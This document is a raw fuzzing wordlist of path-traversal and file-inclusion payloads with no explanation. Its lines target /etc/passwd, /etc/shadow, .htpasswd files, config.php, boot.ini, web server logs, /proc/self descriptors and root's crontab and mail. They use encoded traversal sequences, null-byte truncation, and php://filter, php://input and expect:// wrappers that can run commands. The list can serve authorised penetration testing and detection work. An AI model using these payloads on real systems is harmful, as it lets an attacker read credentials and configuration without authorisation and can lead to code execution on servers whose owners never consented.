/etc/master.passwd
/master.passwd
etc/passwd
etc/shadow%00
/etc/passwd
/etc/passwd%00
../etc/passwd
../etc/passwd%00
../../etc/passwd
../../etc/passwd%00
../../../etc/passwd
../../../etc/passwd%00
../../../../etc/passwd
../../../../etc/passwd%00
../../../../../etc/passwd
../../../../../etc/passwd%00
../../../../../../etc/passwd
../../../../../../etc/passwd%00
../../../../../../../etc/passwd
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../../../../../../../../../../../etc/shadow%00
../../../../../../etc/passwd&=%3C%3C%3C%3C
../../../administrator/inbox
../../../../../../../dev
.htpasswd
passwd
passwd.dat
pass.dat
.htpasswd
/.htpasswd
../.htpasswd
.passwd
/.passwd
../.passwd
.pass
../.pass
members/.htpasswd
member/.htpasswd
user/.htpasswd
users/.htpasswd
root/.htpasswd
db.php
data.php
database.asp
database.js
database.php
dbase.php a
admin/access_log
../users.db.php
users.db.php
/core/config.php
config.php
config.js
../config.js
config.asp
../config.asp
_config.php
../_config.php
../_config.php%00
../config.php
config.inc.php
../config.inc.php
/config.asp
../config.asp
/../../../../pswd
/admin/install.php
../install.php
install.php
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow
..%2F..%2F..%2F%2F..%2F..%2Fetc/passwd
..%2F..%2F..%2F%2F..%2F..%2Fetc/shadow
..%2F..%2F..%2F%2F..%2F..%2F%2Fvar%2Fnamed
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/boot.ini
/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/..\..\..\..\..\..\winnt\win.ini
../../windows/win.ini
..//..//..//..//..//boot.ini
..\../..\../boot.ini
..\../..\../..\../..\../boot.ini
\…..\\\…..\\\…..\\\
=3D “/..” . “%2f..
d:\AppServ\MySQL
c:\AppServ\MySQL
c:WINDOWS/system32/
/C:\Program Files\
/D:\Program Files\
/C:/inetpub/ftproot/
/boot/grub/grub.conf
/proc/interrupts
/proc/cpuinfo
/proc/meminfo
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
/etc/init.d/apache
/etc/init.d/apache2
/etc/httpd/httpd.conf
/etc/apache/apache.conf
/etc/apache/httpd.conf
/etc/apache2/apache2.conf
/etc/apache2/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache/conf/httpd.conf
/opt/apache/conf/httpd.conf
/home/apache/httpd.conf
/home/apache/conf/httpd.conf
/etc/apache2/sites-available/default
/etc/apache2/vhosts.d/default_vhost.include
/etc/passwd
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
expect://ls
php://input&cmd=ls
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/resource=/etc/passwd
/etc/passwd%00
/etc/passwd%2500
/etc/passwd
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../../../etc/passwd
../../../../../../../../../../etc/passwd
../../../../../../../../../../../etc/passwd
/etc/passwd%00
../etc/passwd%00
../../etc/passwd%00
../../../etc/passwd%00
../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../../../etc/passwd%00
../../../../../../../etc/passwd%00
../../../../../../../../etc/passwd%00
../../../../../../../../../etc/passwd%00
../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../etc/passwd%00
/etc/passwd%00.
../etc/passwd%00.
../../etc/passwd%00.
../../../etc/passwd%00.
../../../../etc/passwd%00.
../../../../../etc/passwd%00.
../../../../../../etc/passwd%00.
../../../../../../../etc/passwd%00.
../../../../../../../../etc/passwd%00.
../../../../../../../../../etc/passwd%00.
../../../../../../../../../../etc/passwd%00.
../../../../../../../../../../../etc/passwd%00.
/etc/passwd.html
../etc/passwd.html
../../etc/passwd.html
../../../etc/passwd.html
../../../../etc/passwd.html
../../../../../etc/passwd.html
../../../../../../etc/passwd.html
../../../../../../../etc/passwd.html
../../../../../../../../etc/passwd.html
../../../../../../../../../etc/passwd.html
../../../../../../../../../../etc/passwd.html
../../../../../../../../../../../etc/passwd.html
/etc/hosts
../etc/hosts
../../etc/hosts
../../../etc/hosts
../../../../etc/hosts
../../../../../etc/hosts
../../../../../../etc/hosts
../../../../../../../etc/hosts
../../../../../../../../etc/hosts
../../../../../../../../../etc/hosts
../../../../../../../../../../etc/hosts
../../../../../../../../../../../etc/hosts
/etc/hosts%00
../etc/hosts%00
../../etc/hosts%00
../../../etc/hosts%00
../../../../etc/hosts%00
../../../../../etc/hosts%00
../../../../../../etc/hosts%00
../../../../../../../etc/hosts%00
../../../../../../../../etc/hosts%00
../../../../../../../../../etc/hosts%00
../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../etc/hosts%00
/etc/hosts%00.
../etc/hosts%00.
../../etc/hosts%00.
../../../etc/hosts%00.
../../../../etc/hosts%00.
../../../../../etc/hosts%00.
../../../../../../etc/hosts%00.
../../../../../../../etc/hosts%00.
../../../../../../../../etc/hosts%00.
../../../../../../../../../etc/hosts%00.
../../../../../../../../../../etc/hosts%00.
../../../../../../../../../../../etc/hosts%00.
/etc/hosts.html
../etc/hosts.html
../../etc/hosts.html
../../../etc/hosts.html
../../../../etc/hosts.html
../../../../../etc/hosts.html
../../../../../../etc/hosts.html
../../../../../../../etc/hosts.html
../../../../../../../../etc/hosts.html
../../../../../../../../../etc/hosts.html
../../../../../../../../../../etc/hosts.html
../../../../../../../../../../../etc/hosts.html
/C:\boot.ini
../C:\boot.ini
../../C:\boot.ini
../../../C:\boot.ini
../../../../C:\boot.ini
../../../../../C:\boot.ini
../../../../../../C:\boot.ini
../../../../../../../C:\boot.ini
../../../../../../../../C:\boot.ini
../../../../../../../../../C:\boot.ini
../../../../../../../../../../C:\boot.ini
../../../../../../../../../../../C:\boot.ini
/\boot.ini
../\boot.ini
../../\boot.ini
../../../\boot.ini
../../../../\boot.ini
../../../../../\boot.ini
../../../../../../\boot.ini
../../../../../../../\boot.ini
../../../../../../../../\boot.ini
../../../../../../../../../\boot.ini
../../../../../../../../../../\boot.ini
../../../../../../../../../../../\boot.ini
\boot.ini
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
..\..\..\..\..\boot.ini
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\boot.ini
/boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../../boot.ini
/C:\boot.ini%00
../C:\boot.ini%00
../../C:\boot.ini%00
../../../C:\boot.ini%00
../../../../C:\boot.ini%00
../../../../../C:\boot.ini%00
../../../../../../C:\boot.ini%00
../../../../../../../C:\boot.ini%00
../../../../../../../../C:\boot.ini%00
../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../../C:\boot.ini%00
/\boot.ini%00
../\boot.ini%00
../../\boot.ini%00
../../../\boot.ini%00
../../../../\boot.ini%00
../../../../../\boot.ini%00
../../../../../../\boot.ini%00
../../../../../../../\boot.ini%00
../../../../../../../../\boot.ini%00
../../../../../../../../../\boot.ini%00
../../../../../../../../../../\boot.ini%00
../../../../../../../../../../../\boot.ini%00
\boot.ini%00
..\boot.ini%00
..\..\boot.ini%00
..\..\..\boot.ini%00
..\..\..\..\boot.ini%00
..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/boot.ini%00
../boot.ini%00
../../boot.ini%00
../../../boot.ini%00
../../../../boot.ini%00
../../../../../boot.ini%00
../../../../../../boot.ini%00
../../../../../../../boot.ini%00
../../../../../../../../boot.ini%00
../../../../../../../../../boot.ini%00
../../../../../../../../../../boot.ini%00
../../../../../../../../../../../boot.ini%00
/C:\boot.ini%00.
../C:\boot.ini%00.
../../C:\boot.ini%00.
../../../C:\boot.ini%00.
../../../../C:\boot.ini%00.
../../../../../C:\boot.ini%00.
../../../../../../C:\boot.ini%00.
../../../../../../../C:\boot.ini%00.
../../../../../../../../C:\boot.ini%00.
../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../../C:\boot.ini%00.
/\boot.ini%00.
../\boot.ini%00.
../../\boot.ini%00.
../../../\boot.ini%00.
../../../../\boot.ini%00.
../../../../../\boot.ini%00.
../../../../../../\boot.ini%00.
../../../../../../../\boot.ini%00.
../../../../../../../../\boot.ini%00.
../../../../../../../../../\boot.ini%00.
../../../../../../../../../../\boot.ini%00.
../../../../../../../../../../../\boot.ini%00.
\boot.ini%00.
..\boot.ini%00.
..\..\boot.ini%00.
..\..\..\boot.ini%00.
..\..\..\..\boot.ini%00.
..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.
/boot.ini%00.
../boot.ini%00.
../../boot.ini%00.
../../../boot.ini%00.
../../../../boot.ini%00.
../../../../../boot.ini%00.
../../../../../../boot.ini%00.
../../../../../../../boot.ini%00.
../../../../../../../../boot.ini%00.
../../../../../../../../../boot.ini%00.
../../../../../../../../../../boot.ini%00.
../../../../../../../../../../../boot.ini%00.expect://ls
php://input&cmd=ls
php://filter/convert.base64-encode/resource=/etc/passwd
php://filter/resource=/etc/passwd
/C:\boot.ini
../C:\boot.ini
../../C:\boot.ini
../../../C:\boot.ini
../../../../C:\boot.ini
../../../../../C:\boot.ini
../../../../../../C:\boot.ini
../../../../../../../C:\boot.ini
../../../../../../../../C:\boot.ini
../../../../../../../../../C:\boot.ini
../../../../../../../../../../C:\boot.ini
../../../../../../../../../../../C:\boot.ini
/\boot.ini
../\boot.ini
../../\boot.ini
../../../\boot.ini
../../../../\boot.ini
../../../../../\boot.ini
../../../../../../\boot.ini
../../../../../../../\boot.ini
../../../../../../../../\boot.ini
../../../../../../../../../\boot.ini
../../../../../../../../../../\boot.ini
../../../../../../../../../../../\boot.ini
\boot.ini
..\boot.ini
..\..\boot.ini
..\..\..\boot.ini
..\..\..\..\boot.ini
..\..\..\..\..\boot.ini
..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\boot.ini
..\..\..\..\..\..\..\..\..\..\..\boot.ini
/boot.ini
../boot.ini
../../boot.ini
../../../boot.ini
../../../../boot.ini
../../../../../boot.ini
../../../../../../boot.ini
../../../../../../../boot.ini
../../../../../../../../boot.ini
../../../../../../../../../boot.ini
../../../../../../../../../../boot.ini
../../../../../../../../../../../boot.ini
/C:\boot.ini%00
../C:\boot.ini%00
../../C:\boot.ini%00
../../../C:\boot.ini%00
../../../../C:\boot.ini%00
../../../../../C:\boot.ini%00
../../../../../../C:\boot.ini%00
../../../../../../../C:\boot.ini%00
../../../../../../../../C:\boot.ini%00
../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../C:\boot.ini%00
../../../../../../../../../../../C:\boot.ini%00
/\boot.ini%00
../\boot.ini%00
../../\boot.ini%00
../../../\boot.ini%00
../../../../\boot.ini%00
../../../../../\boot.ini%00
../../../../../../\boot.ini%00
../../../../../../../\boot.ini%00
../../../../../../../../\boot.ini%00
../../../../../../../../../\boot.ini%00
../../../../../../../../../../\boot.ini%00
../../../../../../../../../../../\boot.ini%00
\boot.ini%00
..\boot.ini%00
..\..\boot.ini%00
..\..\..\boot.ini%00
..\..\..\..\boot.ini%00
..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\boot.ini%00
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00
/boot.ini%00
../boot.ini%00
../../boot.ini%00
../../../boot.ini%00
../../../../boot.ini%00
../../../../../boot.ini%00
../../../../../../boot.ini%00
../../../../../../../boot.ini%00
../../../../../../../../boot.ini%00
../../../../../../../../../boot.ini%00
../../../../../../../../../../boot.ini%00
../../../../../../../../../../../boot.ini%00
/C:\boot.ini%00.
../C:\boot.ini%00.
../../C:\boot.ini%00.
../../../C:\boot.ini%00.
../../../../C:\boot.ini%00.
../../../../../C:\boot.ini%00.
../../../../../../C:\boot.ini%00.
../../../../../../../C:\boot.ini%00.
../../../../../../../../C:\boot.ini%00.
../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../C:\boot.ini%00.
../../../../../../../../../../../C:\boot.ini%00.
/\boot.ini%00.
../\boot.ini%00.
../../\boot.ini%00.
../../../\boot.ini%00.
../../../../\boot.ini%00.
../../../../../\boot.ini%00.
../../../../../../\boot.ini%00.
../../../../../../../\boot.ini%00.
../../../../../../../../\boot.ini%00.
../../../../../../../../../\boot.ini%00.
../../../../../../../../../../\boot.ini%00.
../../../../../../../../../../../\boot.ini%00.
\boot.ini%00.
..\boot.ini%00.
..\..\boot.ini%00.
..\..\..\boot.ini%00.
..\..\..\..\boot.ini%00.
..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\boot.ini%00.
..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.
/boot.ini%00.
../boot.ini%00.
../../boot.ini%00.
../../../boot.ini%00.
../../../../boot.ini%00.
../../../../../boot.ini%00.
../../../../../../boot.ini%00.
../../../../../../../boot.ini%00.
../../../../../../../../boot.ini%00.
../../../../../../../../../boot.ini%00.
../../../../../../../../../../boot.ini%00.
../../../../../../../../../../../boot.ini%00.
/windows/system32/drivers/etc/hosts%00
../windows/system32/drivers/etc/hosts%00
../../windows/system32/drivers/etc/hosts%00
../../../windows/system32/drivers/etc/hosts%00
../../../../windows/system32/drivers/etc/hosts%00
../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../../windows/system32/drivers/etc/hosts%00
../../../../../../../../../../../windows/system32/drivers/etc/hosts%00
/xampp/apache/logs/access.log%00
../xampp/apache/logs/access.log%00
../../xampp/apache/logs/access.log%00
../../../xampp/apache/logs/access.log%00
../../../../xampp/apache/logs/access.log%00
../../../../../xampp/apache/logs/access.log%00
../../../../../../xampp/apache/logs/access.log%00
../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../../../xampp/apache/logs/access.log%00
../../../../../../../../../../../xampp/apache/logs/access.log%00
\windows/system32/drivers/etc/hosts%00
..\windows/system32/drivers/etc/hosts%00
..\..\windows/system32/drivers/etc/hosts%00
..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\..\windows/system32/drivers/etc/hosts%00
/xampp/apache/logs/access.log%00
..\xampp/apache/logs/access.log%00
..\..\xampp/apache/logs/access.log%00
..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\..\xampp/apache/logs/access.log%00
\/windows/system32/drivers/etc/hosts%00
..\/windows/system32/drivers/etc/hosts%00
..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
..\..\..\..\..\..\..\..\..\..\..\/windows/system32/drivers/etc/hosts%00
\/xampp/apache/logs/access.log%00
..\/xampp/apache/logs/access.log%00
..\..\/xampp/apache/logs/access.log%00
..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
..\..\..\..\..\..\..\..\..\..\..\/xampp/apache/logs/access.log%00
/etc/passwd\0.php
../etc/passwd\0.php
../../etc/passwd\0.php
../../../etc/passwd\0.php
../../../../etc/passwd\0.php
../../../../../etc/passwd\0.php
../../../../../../etc/passwd\0.php
../../../../../../../etc/passwd\0.php
../../../../../../../../etc/passwd\0.php
../../../../../../../../../etc/passwd\0.php
../../../../../../../../../../etc/passwd\0.php
../../../../../../../../../../../etc/passwd\0.php
/\boot.ini\0.php
../\boot.ini\0.php
../../\boot.ini\0.php
../../../\boot.ini\0.php
../../../../\boot.ini\0.php
../../../../../\boot.ini\0.php
../../../../../../\boot.ini\0.php
../../../../../../../\boot.ini\0.php
../../../../../../../../\boot.ini\0.php
../../../../../../../../../\boot.ini\0.php
../../../../../../../../../../\boot.ini\0.php
../../../../../../../../../../../\boot.ini\0.php
\boot.ini\0.php
..\boot.ini\0.php
..\..\boot.ini\0.php
..\..\..\boot.ini\0.php
..\..\..\..\boot.ini\0.php
..\..\..\..\..\boot.ini\0.php
..\..\..\..\..\..\boot.ini\0.php
..\..\..\..\..\..\..\boot.ini\0.php
..\..\..\..\..\..\..\..\boot.ini\0.php
..\..\..\..\..\..\..\..\..\boot.ini\0.php
..\..\..\..\..\..\..\..\..\..\boot.ini\0.php
..\..\..\..\..\..\..\..\..\..\..\boot.ini\0.php
/boot.ini\0.php
../boot.ini\0.php
../../boot.ini\0.php
../../../boot.ini\0.php
../../../../boot.ini\0.php
../../../../../boot.ini\0.php
../../../../../../boot.ini\0.php
../../../../../../../boot.ini\0.php
../../../../../../../../boot.ini\0.php
../../../../../../../../../boot.ini\0.php
../../../../../../../../../../boot.ini\0.php
../../../../../../../../../../../boot.ini\0.php
/etc/hosts\0.php
../etc/hosts\0.php
../../etc/hosts\0.php
../../../etc/hosts\0.php
../../../../etc/hosts\0.php
../../../../../etc/hosts\0.php
../../../../../../etc/hosts\0.php
../../../../../../../etc/hosts\0.php
../../../../../../../../etc/hosts\0.php
../../../../../../../../../etc/hosts\0.php
../../../../../../../../../../etc/hosts\0.php
../../../../../../../../../../../etc/hosts\0.php
/etc/etc/passwd%00
/etc/etc/passwd%00.
../etc../etc/passwd%00
../../etc../../etc/passwd%00.
../../../etc../../../etc/passwd%00
../../../../etc../../../../etc/passwd%00
../etc../etc/passwd%00.
../../etc../../etc/passwd%00.
../../../etc../../../etc/passwd%00.
../../../../etc../../../../etc/passwd%00.
/proc/self/fd/1%00
/proc/self/fd/2%00
/proc/self/fd/3%00
/proc/self/fd/4%00
/proc/self/fd/5%00
/proc/self/fd/6%00
/proc/self/fd/7%00
/proc/self/fd/8%00
/proc/self/fd/9%00
/proc/self/fd/10%00
/proc/self/fd/11%00
/proc/self/fd/12%00
/proc/self/fd/13%00
/proc/self/fd/14%00
/proc/self/fd/15%00
/proc/self/fd/16%00
../proc/self/fd/1%00
../proc/self/fd/2%00
../proc/self/fd/3%00
../proc/self/fd/4%00
../proc/self/fd/5%00
../proc/self/fd/6%00
../proc/self/fd/7%00
../proc/self/fd/8%00
../proc/self/fd/9%00
../proc/self/fd/10%00
../proc/self/fd/11%00
../proc/self/fd/12%00
../proc/self/fd/13%00
../proc/self/fd/14%00
../proc/self/fd/15%00
../proc/self/fd/16%00
../../proc/self/fd/1%00
../../proc/self/fd/2%00
../../proc/self/fd/3%00
../../proc/self/fd/4%00
../../proc/self/fd/5%00
../../proc/self/fd/6%00
../../proc/self/fd/7%00
../../proc/self/fd/8%00
../../proc/self/fd/9%00
../../proc/self/fd/10%00
../../proc/self/fd/11%00
../../proc/self/fd/12%00
../../proc/self/fd/13%00
../../proc/self/fd/14%00
../../proc/self/fd/15%00
../../proc/self/fd/16%00
../../../proc/self/fd/1%00
../../../proc/self/fd/2%00
../../../proc/self/fd/3%00
../../../proc/self/fd/4%00
../../../proc/self/fd/5%00
../../../proc/self/fd/6%00
../../../proc/self/fd/7%00
../../../proc/self/fd/8%00
../../../proc/self/fd/9%00
../../../proc/self/fd/10%00
../../../proc/self/fd/11%00
../../../proc/self/fd/12%00
../../../proc/self/fd/13%00
../../../proc/self/fd/14%00
../../../proc/self/fd/15%00
../../../proc/self/fd/16%00
/proc/self/fd/1%00.
/proc/self/fd/2%00.
/proc/self/fd/3%00.
/proc/self/fd/4%00.
/proc/self/fd/5%00.
/proc/self/fd/6%00.
/proc/self/fd/7%00.
/proc/self/fd/8%00.
/proc/self/fd/9%00.
/proc/self/fd/10%00.
/proc/self/fd/11%00.
/proc/self/fd/12%00.
/proc/self/fd/13%00.
/proc/self/fd/14%00.
/proc/self/fd/15%00.
/proc/self/fd/16%00.
../proc/self/fd/1%00.
../proc/self/fd/2%00.
../proc/self/fd/3%00.
../proc/self/fd/4%00.
../proc/self/fd/5%00.
../proc/self/fd/6%00.
../proc/self/fd/7%00.
../proc/self/fd/8%00.
../proc/self/fd/9%00.
../proc/self/fd/10%00.
../proc/self/fd/11%00.
../proc/self/fd/12%00.
../proc/self/fd/13%00.
../proc/self/fd/14%00.
../proc/self/fd/15%00.
../proc/self/fd/16%00.
../../proc/self/fd/1%00.
../../proc/self/fd/2%00.
../../proc/self/fd/3%00.
../../proc/self/fd/4%00.
../../proc/self/fd/5%00.
../../proc/self/fd/6%00.
../../proc/self/fd/7%00.
../../proc/self/fd/8%00.
../../proc/self/fd/9%00.
../../proc/self/fd/10%00.
../../proc/self/fd/11%00.
../../proc/self/fd/12%00.
../../proc/self/fd/13%00.
../../proc/self/fd/14%00.
../../proc/self/fd/15%00.
../../proc/self/fd/16%00.
../../../proc/self/fd/1%00.
../../../proc/self/fd/2%00.
../../../proc/self/fd/3%00.
../../../proc/self/fd/4%00.
../../../proc/self/fd/5%00.
../../../proc/self/fd/6%00.
../../../proc/self/fd/7%00.
../../../proc/self/fd/8%00.
../../../proc/self/fd/9%00.
../../../proc/self/fd/10%00.
../../../proc/self/fd/11%00.
../../../proc/self/fd/12%00.
../../../proc/self/fd/13%00.
../../../proc/self/fd/14%00.
../../../proc/self/fd/15%00.
../../../proc/self/fd/16%00.
/proc/self/cmdline%00
../proc/self/cmdline%00
../../proc/self/cmdline%00
../../../proc/self/cmdline%00
../../../../proc/self/cmdline%00
../../../../../proc/self/cmdline%00
../../../../../../proc/self/cmdline%00
../../../../../../../proc/self/cmdline%00
../../../../../../../../proc/self/cmdline%00
/proc/self/cmdline%00.
../proc/self/cmdline%00.
../../proc/self/cmdline%00.
../../../proc/self/cmdline%00.
../../../../proc/self/cmdline%00.
../../../../../proc/self/cmdline%00.
../../../../../../proc/self/cmdline%00.
../../../../../../../proc/self/cmdline%00.
../../../../../../../../proc/self/cmdline%00.
/var/log/messages
/var/log/dmessage
/var/mail/root
/var/spool/cron/crontabs/root
/var/log/messages%00
/var/log/dmessage%00
/var/mail/root%00
/var/spool/cron/crontabs/root%00
/var/log/messages%00.
/var/log/dmessage%00.
/var/mail/root%00.
/var/spool/cron/crontabs/root%00.
/var/log/messages\0.php
/var/log/dmessage\0.php
/var/mail/root\0.php
/var/spool/cron/crontabs/root\0.php
/var/log/messages.html
/var/log/dmessage.html
/var/mail/root.html
/var/spool/cron/crontabs/root.html
../var/log/messages
../var/log/dmessage
../var/mail/root
../var/spool/cron/crontabs/root
../../var/log/messages
../../var/log/dmessage
../../var/mail/root
../../var/spool/cron/crontabs/root
../../../var/log/messages
../../../var/log/dmessage
../../../var/mail/root
../../../var/spool/cron/crontabs/root
../var/log/messages%00
../var/log/dmessage%00
../var/mail/root%00
../var/spool/cron/crontabs/root%00
../../var/log/messages%00
../../var/log/dmessage%00
../../var/mail/root%00
../../var/spool/cron/crontabs/root%00
../../../var/log/messages%00
../../../var/log/dmessage%00
../../../var/mail/root%00
../../../var/spool/cron/crontabs/root%00
../var/log/messages%00.
../var/log/dmessage%00.
../var/mail/root%00.
../var/spool/cron/crontabs/root%00.
../../var/log/messages%00.
../../var/log/dmessage%00.
../../var/mail/root%00.
../../var/spool/cron/crontabs/root%00.
../../../var/log/messages%00.
../../../var/log/dmessage%00.
../../../var/mail/root%00.
../../../var/spool/cron/crontabs/root%00.
../var/log/messages.html
../var/log/dmessage.html
../var/mail/root.html
../var/spool/cron/crontabs/root.html
../../var/log/messages.html
../../var/log/dmessage.html
../../var/mail/root.html
../../var/spool/cron/crontabs/root.html
../../../var/log/messages.html
../../../var/log/dmessage.html
../../../var/mail/root.html
../../../var/spool/cron/crontabs/root.html
../var/log/messages\0.php
../var/log/dmessage\0.php
../var/mail/root\0.php
../var/spool/cron/crontabs/root\0.php
../../var/log/messages\0.php
../../var/log/dmessage\0.php
../../var/mail/root\0.php
../../var/spool/cron/crontabs/root\0.php
../../../var/log/messages\0.php
../../../var/log/dmessage\0.php
../../../var/mail/root\0.php
../../../var/spool/cron/crontabs/root\0.php
/var/log/apache/access.log
